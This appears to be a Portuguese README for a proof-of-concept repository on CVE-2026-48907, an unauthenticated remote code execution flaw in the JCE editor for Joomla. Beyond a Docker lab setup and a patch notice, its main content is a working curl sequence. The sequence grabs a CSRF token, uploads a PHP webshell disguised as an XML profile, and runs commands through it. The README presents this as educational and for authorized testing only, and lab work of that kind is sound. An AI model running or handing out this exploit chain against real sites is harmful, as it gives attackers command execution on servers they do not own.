
POC for CVE-2026-48907
PSsec Laboratório educacional de pesquisa em segurança para CVE-2026-48907.
CVE-2026-48907 é uma vulnerabilidade crítica (CVSS 10.0) de execução remota de código não autenticado no JCE (Joomla Content Editor), a extensão de editor mais amplamente instalada para Joomla, afetando todas as versões ≤ 2.9.99.4.
O endpoint profiles.import aceita uploads de arquivos sem nenhuma autenticação. Um atacante pode enviar um arquivo PHP malicioso disfarçado de perfil XML, que é escrito no diretório tmp/ do servidor e executado diretamente via HTTP — nenhuma credencial necessária.
| Detalhe | Valor |
|---|---|
| CVE | CVE-2026-48907 |
| Pontuação CVSS | 10.0 Crítico |
| Versões Afetadas | JCE ≤ 2.9.99.4 |
| Versões Corrigidas | JCE ≥ 2.9.99.5 |
| Listado no CISA KEV | Sim — 16 de junho de 2026 |
| Ativamente Explorado | Sim |
docker compose up -d
Abra http://localhost:8080 no seu navegador e complete o assistente de configuração usando estas credenciais:
| Campo | Valor |
|---|---|
| Host do Banco de Dados | db |
| Nome do Banco de Dados | joomla |
| Usuário do Banco de Dados | joomla |
wget https://github.com/widgetfactory/jce/releases/download/2.9.99.4/pkg_jce_29994.zip
Em seguida, no Admin do Joomla → Sistema → Extensões → Instalar → faça upload do ZIP.
URL=http://localhost:8080
TOKEN=$(curl -s -c cookies.txt "$URL/" \
| sed -n 's/.*"csrf\.token"[[:space:]]*:[[:space:]]*"\([a-f0-9]\{32\}\)".*/\1/p; s/.*name="\([a-f0-9]\{32\}\)"[^>]*value="1".*/\1/p' \
| head -n1)
curl -i -s -b cookies.txt -c cookies.txt \
-F "[email protected];type=application/xml" \
-F "task=profiles.import" \
-F "${TOKEN}=1" \
"$URL/index.php?option=com_jce"
curl -i -s -b cookies.txt -c cookies.txt \
"$URL/tmp/shell.xml.php?cmd=id"
Saída esperada: uid=33(www-data) gid=33(www-data)
| Arquivo | Descrição |
|---|---|
docker-compose.yml | Inicia Joomla 5.3.1 vulnerável + MySQL 8.0 |
shell.xml.php | Payload mínimo de webshell PHP |
instructions.txt | Notas passo a passo de exploração |
Atualize o JCE para versão 2.9.99.5 ou superior imediatamente.
Aviso oficial do fornecedor e patch gratuito para versões antigas do Joomla: Atualização de Segurança do JCE — joomlacontenteditor.net
Este repositório é destinado estritamente para fins educacionais e de pesquisa de segurança autorizada.
Os testes devem ser realizados apenas em sistemas que você possui ou tem permissão explícita por escrito para testar. O uso não autorizado deste material contra sistemas que você não possui é ilegal e antiético. Os autores e a Pansophical OU não aceitam nenhuma responsabilidade pelo uso indevido deste conteúdo.
Este ambiente de laboratório é intencionalmente vulnerável. Não o exponha à internet ou a qualquer rede não confiável.
Por PSsec
| Senha do Banco de Dados | joomlapass |